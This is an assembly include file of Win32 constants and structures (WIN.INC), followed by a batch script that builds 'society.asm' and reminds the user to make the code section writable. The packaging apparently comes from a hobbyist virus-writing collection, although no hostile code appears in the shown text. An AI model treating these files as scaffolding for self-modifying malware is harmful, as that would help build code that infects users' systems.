EDGE_SUNKEN             equ     BDR_SUNKENOUTER + BDR_SUNKENINNER
EDGE_ETCHED             equ     BDR_SUNKENOUTER + BDR_RAISEDINNER
EDGE_BUMP               equ     BDR_RAISEDOUTER + BDR_SUNKENINNER
BF_LEFT                 equ     01h
BF_TOP                  equ     02h
BF_RIGHT                equ     04h
BF_BOTTOM               equ     08h
BF_RECT                 equ     BF_LEFT + BF_TOP + BF_RIGHT + BF_BOTTOM
IDOK                            equ     1
IDCANCEL                        equ     2
IDABORT                         equ     3
IDRETRY                         equ     4
IDIGNORE                        equ     5
IDYES                           equ     6
IDNO                            equ     7
IDCLOSE                         equ     8
IDHELP                          equ     9
COLOR_BTNFACE                        equ 15
DLGWINDOWEXTRA                       equ 30
IDC_ARROW                            equ 32512
WM_CTLCOLORDLG                       equ 136h
WM_SETFOCUS equ 7
WM_KEYFIRST                     equ     0100h
WM_KEYDOWN                      equ     0100h
WM_KEYUP                        equ     0101h
WM_CHAR                         equ     0102h
WM_DEADCHAR                     equ     0103h
WM_SYSKEYDOWN                   equ     0104h
WM_SYSKEYUP                     equ     0105h
WM_SYSCHAR                      equ     0106h
WM_SYSDEADCHAR                  equ     0107h
WM_KEYLAST                      equ     0108h
WM_SETICON equ 80h

DS_3DLOOK           equ 0004H
DS_FIXEDSYS         equ 0008H
DS_NOFAILCREATE     equ 0010H
DS_CONTROL          equ 0400H
DS_CENTER           equ 0800H
DS_CENTERMOUSE      equ 1000H
DS_CONTEXTHELP      equ 2000H
DS_ABSALIGN         equ 01h
DS_SYSMODAL         equ 02h
DS_LOCALEDIT        equ 20h
DS_SETFONT          equ 40h
DS_MODALFRAME       equ 80h
DS_NOIDLEMSG        equ 100h
DS_SETFOREGROUND    equ 200h

FILE_FLAG_WRITE_THROUGH         equ 80000000h
FILE_FLAG_OVERLAPPED            equ 40000000h
FILE_FLAG_NO_BUFFERING          equ 20000000h
FILE_FLAG_RANDOM_ACCESS         equ 10000000h
FILE_FLAG_SequENTIAL_SCAN       equ 08000000h
FILE_FLAG_DELETE_ON_CLOSE       equ 04000000h
FILE_FLAG_BACKUP_SEMANTICS      equ 02000000h
FILE_FLAG_POSIX_SEMANTICS       equ 01000000h

CREATE_NEW          equ 1
CREATE_ALWAYS       equ 2
OPEN_EXISTING       equ 3
OPEN_ALWAYS         equ 4
TRUNCATE_EXISTING   equ 5

GMEM_FIXED          equ 0000h
GMEM_MOVEABLE       equ 0002h
GMEM_NOCOMPACT      equ 0010h
GMEM_NODISCARD      equ 0020h
GMEM_ZEROINIT       equ 0040h
GMEM_MODIFY         equ 0080h
GMEM_DISCARDABLE    equ 0100h
GMEM_NOT_BANKED     equ 1000h
GMEM_SHARE          equ 2000h
GMEM_DDESHARE       equ 2000h
GMEM_NOTIFY         equ 4000h
GMEM_LOWER          equ GMEM_NOT_BANKED
GMEM_VALID_FLAGS    equ 7F72h
GMEM_INVALID_HANDLE equ 8000h


LMEM_FIXED          equ 0000h
LMEM_MOVEABLE       equ 0002h
LMEM_NOCOMPACT      equ 0010h
LMEM_NODISCARD      equ 0020h
LMEM_ZEROINIT       equ 0040h
LMEM_MODIFY         equ 0080h
LMEM_DISCARDABLE    equ 0F00h
LMEM_VALID_FLAGS    equ 0F72h
LMEM_INVALID_HANDLE equ 8000h
                    
LHND                equ (LMEM_MOVEABLE or LMEM_ZEROINIT)
LPTR                equ (LMEM_FIXED or LMEM_ZEROINIT)
                    
NONZEROLHND         equ (LMEM_MOVEABLE)
NONZEROLPTR         equ (LMEM_FIXED)
LMEM_DISCARDED      equ 4000h
LMEM_LOCKCOUNT      equ 00FFh
DRIVE_UNKNOWN     equ 0 
DRIVE_NO_ROOT_DIR equ 1 
DRIVE_REMOVABLE   equ 2 
DRIVE_FIXED       equ 3 
DRIVE_REMOTE      equ 4 
DRIVE_CDROM       equ 5 
DRIVE_RAMDISK     equ 6 
FILE_TYPE_UNKNOWN   equ 0000h
FILE_TYPE_DISK      equ 0001h
FILE_TYPE_CHAR      equ 0002h
FILE_TYPE_PIPE      equ 0003h
FILE_TYPE_REMOTE    equ 8000h

;================================ WINNT.H ===============
FILE_READ_DATA            equ ( 0001h )
FILE_LIST_DIRECTORY       equ ( 0001h )
FILE_WRITE_DATA           equ ( 0002h )
FILE_ADD_FILE             equ ( 0002h )
FILE_APPEND_DATA          equ ( 0004h )
FILE_ADD_SUBDIRECTORY     equ ( 0004h )
FILE_CREATE_PIPE_INSTANCE equ ( 0004h )
FILE_READ_EA              equ ( 0008h )
FILE_WRITE_EA             equ ( 0010h )
FILE_EXECUTE              equ ( 0020h )
FILE_TRAVERSE             equ ( 0020h )
FILE_DELETE_CHILD         equ ( 0040h )
FILE_READ_ATTRIBUTES      equ ( 0080h )
FILE_WRITE_ATTRIBUTES     equ ( 0100h )

;FILE_ALL_ACCESS      equ (STANDARD_RIGHTS_RequIRED or SYNCHRONIZE or 1FFh)
;FILE_GENERIC_READ    equ (STANDARD_RIGHTS_READ or FILE_READ_DATA or FILE_READ_ATTRIBUTES or FILE_READ_EA or SYNCHRONIZE)
;FILE_GENERIC_WRITE   equ (STANDARD_RIGHTS_WRITE or FILE_WRITE_DATA or FILE_WRITE_ATTRIBUTES or FILE_WRITE_EA or FILE_APPEND_DATA or SYNCHRONIZE)
;FILE_GENERIC_EXECUTE equ (STANDARD_RIGHTS_EXECUTE or FILE_READ_ATTRIBUTES or FILE_EXECUTE or SYNCHRONIZE)

FILE_SHARE_READ                 equ 00000001h
FILE_SHARE_WRITE                equ 00000002h  
FILE_SHARE_DELETE               equ 00000004h  
FILE_ATTRIBUTE_READONLY         equ 00000001h  
FILE_ATTRIBUTE_HIDDEN           equ 00000002h  
FILE_ATTRIBUTE_SYSTEM           equ 00000004h  
FILE_ATTRIBUTE_DIRECTORY        equ 00000010h  
FILE_ATTRIBUTE_ARCHIVE          equ 00000020h  
FILE_ATTRIBUTE_NORMAL           equ 00000080h  
FILE_ATTRIBUTE_TEMPORARY        equ 00000100h  
FILE_ATTRIBUTE_COMPRESSED       equ 00000800h  
FILE_ATTRIBUTE_OFFLINE          equ 00001000h  
FILE_NOTIFY_CHANGE_FILE_NAME    equ 00000001h   
FILE_NOTIFY_CHANGE_DIR_NAME     equ 00000002h   
FILE_NOTIFY_CHANGE_ATTRIBUTES   equ 00000004h   
FILE_NOTIFY_CHANGE_SIZE         equ 00000008h   
FILE_NOTIFY_CHANGE_LAST_WRITE   equ 00000010h   
FILE_NOTIFY_CHANGE_LAST_ACCESS  equ 00000020h   
FILE_NOTIFY_CHANGE_CREATION     equ 00000040h   
FILE_NOTIFY_CHANGE_SECURITY     equ 00000100h   
FILE_ACTION_ADDED               equ 00000001h   
FILE_ACTION_REMOVED             equ 00000002h   
FILE_ACTION_MODIFIED            equ 00000003h   
FILE_ACTION_RENAMED_OLD_NAME    equ 00000004h   
FILE_ACTION_RENAMED_NEW_NAME    equ 00000005h   
FILE_CASE_SENSITIVE_SEARCH      equ 00000001h  
FILE_CASE_PRESERVED_NAMES       equ 00000002h  
FILE_UNICODE_ON_DISK            equ 00000004h  
FILE_PERSISTENT_ACLS            equ 00000008h  
FILE_FILE_COMPRESSION           equ 00000010h  
FILE_VOLUME_IS_COMPRESSED       equ 00008000h  
GENERIC_READ                    equ 80000000h
GENERIC_WRITE                   equ 40000000h
GENERIC_EXECUTE                 equ 20000000h
GENERIC_ALL                     equ 10000000h

DELETE                          equ  00010000h
READ_CONTROL                    equ  00020000h
WRITE_DAC                       equ  00040000h
WRITE_OWNER                     equ  00080000h
SYNCHRONIZE                     equ  00100000h
STANDARD_RIGHTS_RequIRED        equ  000F0000h
STANDARD_RIGHTS_READ            equ  READ_CONTROL
STANDARD_RIGHTS_WRITE           equ  READ_CONTROL
STANDARD_RIGHTS_EXECUTE         equ  READ_CONTROL
STANDARD_RIGHTS_ALL             equ  001F0000h
SPECIFIC_RIGHTS_ALL             equ  0000FFFFh

FILE_BEGIN           equ 0
FILE_CURRENT         equ 1
FILE_END             equ 2

ES_LEFT             equ 0000h
ES_CENTER           equ 0001h
ES_RIGHT            equ 0002h
ES_MULTILINE        equ 0004h
ES_UPPERCASE        equ 0008h
ES_LOWERCASE        equ 0010h
ES_PASSWORD         equ 0020h
ES_AUTOVSCROLL      equ 0040h
ES_AUTOHSCROLL      equ 0080h
ES_NOHIDESEL        equ 0100h
ES_OEMCONVERT       equ 0400h
ES_READONLY         equ 0800h
ES_WANTRETURN       equ 1000h
EN_SETFOCUS         equ 0100h
EN_KILLFOCUS        equ 0200h
EN_CHANGE           equ 0300h
EN_UPDATE           equ 0400h
EN_ERRSPACE         equ 0500h
EN_MAXTEXT          equ 0501h
EN_HSCROLL          equ 0601h
EN_VSCROLL          equ 0602h
EC_LEFTMARGIN       equ 0001h
EC_RIGHTMARGIN      equ 0002h
EC_USEFONTINFO      equ 0ffffh
EM_GETSEL               equ 00B0h
EM_SETSEL               equ 00B1h
EM_GETRECT              equ 00B2h
EM_SETRECT              equ 00B3h
EM_SETRECTNP            equ 00B4h
EM_SCROLL               equ 00B5h
EM_LINESCROLL           equ 00B6h
EM_SCROLLCARET          equ 00B7h
EM_GETMODIFY            equ 00B8h
EM_SETMODIFY            equ 00B9h
EM_GETLINECOUNT         equ 00BAh
EM_LINEINDEX            equ 00BBh
EM_SETHANDLE            equ 00BCh
EM_GETHANDLE            equ 00BDh
EM_GETTHUMB             equ 00BEh
EM_LINELENGTH           equ 00C1h
EM_REPLACESEL           equ 00C2h
EM_GETLINE              equ 00C4h
EM_LIMITTEXT            equ 00C5h
EM_CANUNDO              equ 00C6h
EM_UNDO                 equ 00C7h
EM_FMTLINES             equ 00C8h
EM_LINEFROMCHAR         equ 00C9h
EM_SETTABSTOPS          equ 00CBh
EM_SETPASSWORDCHAR      equ 00CCh
EM_EMPTYUNDOBUFFER      equ 00CDh
EM_GETFIRSTVISIBLELINE  equ 00CEh
EM_SETREADONLY          equ 00CFh
EM_SETWORDBREAKPROC     equ 00D0h
EM_GETWORDBREAKPROC     equ 00D1h
EM_GETPASSWORDCHAR      equ 00D2h
EM_SETMARGINS           equ 00D3h
EM_GETMARGINS           equ 00D4
EM_SETLIMITTEXT         equ EM_LIMITTEXT
EM_GETLIMITTEXT         equ 00D5h
EM_POSFROMCHAR          equ 00D6h
EM_CHARFROMPOS          equ 00D7h
WB_LEFT           equ  0        
WB_RIGHT          equ  1        
WB_ISDELIMITER    equ  2        
BS_PUSHBUTTON     equ   00000000h
BS_DEFPUSHBUTTON  equ   00000001h
BS_CHECKBOX       equ   00000002h
BS_AUTOCHECKBOX   equ   00000003h
BS_RADIOBUTTON    equ   00000004h
BS_3STATE         equ   00000005h
BS_AUTO3STATE     equ   00000006h
BS_GROUPBOX       equ   00000007h
BS_USERBUTTON     equ   00000008h
BS_AUTORADIOBUTTON equ   00000009h
BS_OWNERDRAW      equ   0000000Bh
BS_LEFTTEXT       equ   00000020h
BS_TEXT           equ   00000000h
BS_ICON           equ   00000040h
BS_BITMAP         equ   00000080h
BS_LEFT           equ   00000100h
BS_RIGHT          equ   00000200h
BS_CENTER         equ   00000300h
BS_TOP            equ   00000400h
BS_BOTTOM         equ   00000800h
BS_VCENTER        equ   00000C00h
BS_PUSHLIKE       equ   00001000h
BS_MULTILINE      equ   00002000h
BS_NOTIFY         equ   00004000h
BS_FLAT           equ   00008000h
BS_RIGHTBUTTON    equ   BS_LEFTTEXT
BN_CLICKED        equ   0       
BN_PAINT          equ   1       
BN_HILITE         equ   2       
BN_UNHILITE       equ   3       
BN_DISABLE        equ   4       
BN_DOUBLECLICKED  equ   5       
BN_PUSHED         equ   BN_HILITE
BN_UNPUSHED       equ   BN_UNHILITE
BN_DBLCLK         equ   BN_DOUBLECLICKED
BN_SETFOCUS       equ   6
BN_KILLFOCUS      equ   7
BM_GETCHECK       equ  00F0h
BM_SETCHECK       equ  00F1h
BM_GETSTATE       equ  00F2h
BM_SETSTATE       equ  00F3h
BM_SETSTYLE       equ  00F4h
BM_CLICK          equ  00F5h
BM_GETIMAGE       equ  00F6h
BM_SETIMAGE       equ  00F7h
BST_UNCHECKED     equ  0000h
BST_CHECKED       equ  0001h
BST_INDETERMINATE equ  0002h
BST_PUSHED        equ  0004h
BST_FOCUS         equ  0008h
SS_LEFT           equ   00000000h
SS_CENTER         equ   00000001h
SS_RIGHT          equ   00000002h
SS_ICON           equ   00000003h
SS_BLACKRECT      equ   00000004h
SS_GRAYRECT       equ   00000005h
SS_WHITERECT      equ   00000006h
SS_BLACKFRAME     equ   00000007h
SS_GRAYFRAME      equ   00000008h
SS_WHITEFRAME     equ   00000009h
SS_USERITEM       equ   0000000Ah
SS_SIMPLE         equ   0000000Bh
SS_LEFTNOWORDWRAP equ   0000000Ch
SS_OWNERDRAW      equ   0000000Dh
SS_BITMAP         equ   0000000Eh
SS_ENHMETAFILE    equ   0000000Fh
SS_ETCHEDHORZ     equ   00000010h
SS_ETCHEDVERT     equ   00000011h
SS_ETCHEDFRAME    equ   00000012h
SS_TYPEMASK       equ   0000001Fh
SS_NOTIFY         equ   00000100h
SS_CENTERIMAGE    equ   00000200h
SS_RIGHTJUST      equ   00000400h
SS_REALSIZEIMAGE  equ   00000800h
SS_SUNKEN         equ   00001000h
SS_ENDELLIPSIS    equ   00004000h
SS_PATHELLIPSIS   equ   00008000h
SS_WORDELLIPSIS   equ   0000C000h
SS_ELLIPSISMASK   equ   0000C000h

CDN_FIRST   equ (0-601)
CDN_LAST    equ (0-699)
OFN_READONLY                 equ 00000001h
OFN_OVERWRITEPROMPT          equ 00000002h
OFN_HIDEREADONLY             equ 00000004h
OFN_NOCHANGEDIR              equ 00000008h
OFN_SHOWHELP                 equ 00000010h
OFN_ENABLEHOOK               equ 00000020h
OFN_ENABLETEMPLATE           equ 00000040h
OFN_ENABLETEMPLATEHANDLE     equ 00000080h
OFN_NOVALIDATE               equ 00000100h
OFN_ALLOWMULTISELECT         equ 00000200h
OFN_EXTENSIONDIFFERENT       equ 00000400h
OFN_PATHMUSTEXIST            equ 00000800h
OFN_FILEMUSTEXIST            equ 00001000h
OFN_CREATEPROMPT             equ 00002000h
OFN_SHAREAWARE               equ 00004000h
OFN_NOREADONLYRETURN         equ 00008000h
OFN_NOTESTFILECREATE         equ 00010000h
OFN_NONETWORKBUTTON          equ 00020000h
OFN_NOLONGNAMES              equ 00040000h   
OFN_EXPLORER                 equ 00080000h   
OFN_NODEREFERENCELINKS       equ 00100000h
OFN_LONGNAMES                equ 00200000h   
OFN_SHAREFALLTHROUGH    equ  2   
OFN_SHARENOWARN         equ  1
OFN_SHAREWARN           equ  0
CDN_INITDONE            equ (CDN_FIRST - 0000)
CDN_SELCHANGE           equ (CDN_FIRST - 0001)
CDN_FOLDERCHANGE        equ (CDN_FIRST - 0002)
CDN_SHAREVIOLATION      equ (CDN_FIRST - 0003)
CDN_HELP                equ (CDN_FIRST - 0004)
CDN_FILEOK              equ (CDN_FIRST - 0005)
CDN_TYPECHANGE          equ (CDN_FIRST - 0006)

DEBUG_PROCESS               equ 00000001h
DEBUG_ONLY_THIS_PROCESS     equ 00000002h
CREATE_SUSPENDED            equ 00000004h
DETACHED_PROCESS            equ 00000008h
CREATE_NEW_CONSOLE          equ 00000010h
NORMAL_PRIORITY_CLASS       equ 00000020h
IDLE_PRIORITY_CLASS         equ 00000040h
HIGH_PRIORITY_CLASS         equ 00000080h
REALTIME_PRIORITY_CLASS     equ 00000100h
CREATE_NEW_PROCESS_GROUP    equ 00000200h
CREATE_UNICODE_ENVIRONMENT  equ 00000400h
CREATE_SEPARATE_WOW_VDM     equ 00000800h
CREATE_SHARED_WOW_VDM       equ 00001000h
CREATE_FORCEDOS             equ 00002000h
CREATE_DEFAULT_ERROR_MODE   equ 04000000h
CREATE_NO_WINDOW            equ 08000000h
PROFILE_USER                equ 10000000h
PROFILE_KERNEL              equ 20000000h
PROFILE_SERVER              equ 40000000h

MAXLONGLONG equ (7fffffffffffffffh)
MAXLONG     equ 7fffffffh
MAXBYTE     equ 0ffh
MAXWORD     equ 0ffffh
MAXDWORD    equ 0ffffffffh
MINCHAR     equ 80h
MAXCHAR     equ 07fh
MINSHORT    equ 8000h
MAXSHORT    equ 7fffh
MINLONG     equ 80000000h

THREAD_BASE_PRIORITY_LOWRT  equ 15  ;// value that gets a thread to LowRealtime-1
THREAD_BASE_PRIORITY_MAX    equ 2   ;// maximum thread base priority boost
THREAD_BASE_PRIORITY_MIN    equ -2  ;// minimum thread base priority boost
THREAD_BASE_PRIORITY_IDLE   equ -15 ;// value that gets a thread to idle
THREAD_PRIORITY_LOWEST          equ THREAD_BASE_PRIORITY_MIN
THREAD_PRIORITY_BELOW_NORMAL    equ (THREAD_PRIORITY_LOWEST+1)
THREAD_PRIORITY_NORMAL          equ 0
THREAD_PRIORITY_HIGHEST         equ THREAD_BASE_PRIORITY_MAX
THREAD_PRIORITY_ABOVE_NORMAL    equ (THREAD_PRIORITY_HIGHEST-1)
THREAD_PRIORITY_ERROR_RETURN    equ (MAXLONG)
THREAD_PRIORITY_TIME_CRITICAL   equ THREAD_BASE_PRIORITY_LOWRT
THREAD_PRIORITY_IDLE            equ THREAD_BASE_PRIORITY_IDLE

HKEY_CLASSES_ROOT      equ      80000000h
HKEY_CURRENT_USER      equ      80000001h
HKEY_LOCAL_MACHINE     equ      80000002h
HKEY_USERS             equ      80000003h
HKEY_PERFORMANCE_DATA  equ      80000004h
HKEY_CURRENT_CONFIG    equ      80000005h
HKEY_DYN_DATA          equ      80000006h
 
REG_OPTION_RESERVED     equ 00000000h
REG_OPTION_NON_VOLATILE equ 00000000h
REG_OPTION_VOLATILE     equ 00000001h
REG_OPTION_CREATE_LINK  equ 00000002h
REG_OPTION_BACKUP_RESTORE equ 00000004h
REG_OPTION_OPEN_LINK    equ 00000008h
REG_LEGAL_OPTION        equ REG_OPTION_RESERVED or REG_OPTION_NON_VOLATILE or REG_OPTION_VOLATILE or REG_OPTION_CREATE_LINK or REG_OPTION_BACKUP_RESTORE or REG_OPTION_OPEN_LINK
REG_CREATED_NEW_KEY     equ 00000001h
REG_OPENED_EXISTING_KEY equ 00000002h
REG_WHOLE_HIVE_VOLATILE equ 00000001h
REG_REFRESH_HIVE        equ 00000002h
REG_NO_LAZY_FLUSH       equ 00000004h
REG_NOTIFY_CHANGE_NAME       equ     00000001h
REG_NOTIFY_CHANGE_ATTRIBUTES equ     00000002h
REG_NOTIFY_CHANGE_LAST_SET   equ     00000004h
REG_NOTIFY_CHANGE_SECURITY   equ     00000008h
REG_LEGAL_CHANGE_FILTER      equ     REG_NOTIFY_CHANGE_NAME or REG_NOTIFY_CHANGE_ATTRIBUTES or REG_NOTIFY_CHANGE_LAST_SET or REG_NOTIFY_CHANGE_SECURITY
REG_NONE            equ     0
REG_SZ              equ     1
REG_EXPAND_SZ       equ     2
REG_BINARY          equ     3
REG_DWORD           equ     4
REG_DWORD_LITTLE_ENDIAN     equ 4 
REG_DWORD_BIG_ENDIAN        equ 5 
REG_LINK            equ     6
REG_MULTI_SZ        equ     7
REG_RESOURCE_LIST   equ     8
REG_FULL_RESOURCE_DESCRIPTOR   equ 9 
REG_RESOURCE_RequIREMENTS_LIST equ 10

KEY_QUERY_VALUE     equ     0001h
KEY_SET_VALUE       equ     0002h
KEY_CREATE_SUB_KEY  equ     0004h
KEY_ENUMERATE_SUB_KEYS equ  0008h
KEY_NOTIFY          equ     0010h
KEY_CREATE_LINK     equ     0020h

KEY_READ            equ     (STANDARD_RIGHTS_READ or KEY_QUERY_VALUE or KEY_ENUMERATE_SUB_KEYS or KEY_NOTIFY) and (not SYNCHRONIZE)
KEY_WRITE           equ     (STANDARD_RIGHTS_WRITE or KEY_SET_VALUE or KEY_CREATE_SUB_KEY) and (not SYNCHRONIZE)
KEY_EXECUTE         equ     (KEY_READ) and (not SYNCHRONIZE)
KEY_ALL_ACCESS      equ     (STANDARD_RIGHTS_ALL or KEY_QUERY_VALUE or KEY_SET_VALUE or KEY_CREATE_SUB_KEY or KEY_ENUMERATE_SUB_KEYS or KEY_NOTIFY or KEY_CREATE_LINK) and (not SYNCHRONIZE)
SERVICE_KERNEL_DRIVER                   equ     000000001h
SERVICE_FILE_SYSTEM_DRIVER              equ     000000002h
SERVICE_ADAPTER     equ     000000004h
SERVICE_RECOGNIZER_DRIVER               equ     000000008h
SERVICE_DRIVER      equ     SERVICE_KERNEL_DRIVER or SERVICE_FILE_SYSTEM_DRIVER or SERVICE_RECOGNIZER_DRIVER
SERVICE_WIN32_OWN_PROCESS               equ     000000010h
SERVICE_WIN32_SHARE_PROCESS             equ     000000020h
SERVICE_WIN32       equ     SERVICE_WIN32_OWN_PROCESS or SERVICE_WIN32_SHARE_PROCESS
SERVICE_INTERACTIVE_PROCESS             equ     000000100h
SERVICE_TYPE_ALL    equ     SERVICE_WIN32 or SERVICE_ADAPTER or SERVICE_DRIVER or SERVICE_INTERACTIVE_PROCESS
SERVICE_BOOT_START  equ     0
SERVICE_SYSTEM_START          equ     000000001h
SERVICE_AUTO_START  equ     000000002h
SERVICE_DEMAND_START          equ     000000003h
SERVICE_DISABLED    equ     000000004h
SERVICE_ERROR_IGNORE          equ     0
SERVICE_ERROR_NORMAL          equ     000000001h
SERVICE_ERROR_SEVERE          equ     000000002h
SERVICE_ERROR_CRITICAL        equ     000000003h

; ====================================================================
@wordalign macro Adr,x
        if (($-Adr)/2) NE (($-Adr+1)/2) 
            db x
        endif
        endm
@dwordalign macro Adr,x
        if 4-(($-Adr) mod 4)
            db 4-(($-Adr) mod 4) dup (x)
        endif
        endm

f_struc                struc                         ; win32 "searchrec"
                                                     ; structure
ff_attr                 dd      ?
ff_time_create          dd      ?,?
ff_time_lastaccess      dd      ?,?
ff_time_lastwrite       dd      ?,?
ff_size_hi              dd      ?
ff_size                 dd      ?
                        dd      ?,?
ff_fullname             db      260 dup (?) 
                        

ff_shortname            db      14 dup (?)

                        ends

;GDI strucs

WNDCLASSEX	struc
	cbSize		dd	?
	style		dd	?
	lpfnWndProc	dd	?
	cbClsExtra	dd	?
	cbWndExtra	dd	?
	hInstance	dd	?
	hIcon		dd	?
	hCursor		dd	?
	hbrBackground	dd	?
	lpszMenuName	dd	?
	lpszClassName	dd	?
	hIconSm		dd	?
WNDCLASSEX	ends

MSG	struc
	hwnd	dd	?
	message	dd	?
	wParam	dd	?
	lParam	dd	?
	time	dd	?
	pt	dd	?
MSG	ends

RECT    struc
        left    dd      ?
        top     dd      ?
        right   dd      ?
        bottom  dd      ?
RECT    ends

PAINTSTRUCT struc 
         hdc         dd      ? 
         fErase      dd      ?
         rcPaint     RECT<,,,>
         fRestore    dd      ?
         fIncUpdate  dd    ? 
         rgbReserved db 32 dup(?) 
PAINTSTRUCT ends
 





CW_USEDEFAULT		equ	80000000h
SW_SHOWNORMAL		equ	1
COLOR_WINDOW		equ	5
IDI_APPLICATION		equ	32512
WS_OVERLAPPEDWINDOW 	equ	0CF0000h

DT_TOP                  equ    0
DT_LEFT                 equ    0
DT_CENTER               equ    1
DT_RIGHT                equ    2
DT_VCENTER              equ    4
DT_BOTTOM               equ    8
DT_WORDBREAK            equ    10h
DT_SINGLELINE           equ    20h
DT_EXPANDTABS           equ    40h
DT_TABSTOP              equ    80h
DT_NOCLIP               equ    100h
DT_EXTERNALLEADING      equ    200h
DT_CALCRECT             equ    400h
DT_NOPREFIX             equ    800h
DT_INTERNAL             equ    1000h


Pushad_Struc	STRUC
_edi		DD	?
_esi		DD	?
_ebp		DD	?
_esp		DD	?
_ebx		DD	?
_edx		DD	?
_ecx		DD	?
_eax		DD	?
Pushad_Struc	ENDS
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[WIN.INC]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MAKE.BAT]ÄÄÄ
@echo off
tasm /m /ml society.asm >nul
if not exist society.obj goto err
tlink32 /Tpe /aa /x /c society.obj,,,f:\asm\inc\import32.lib >nul
del society.obj           >nul         
echo Make code section r/w.! 
goto end
:err
echo ********* ERROR! *********
:end
@echo on
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MAKE.BAT]ÄÄÄ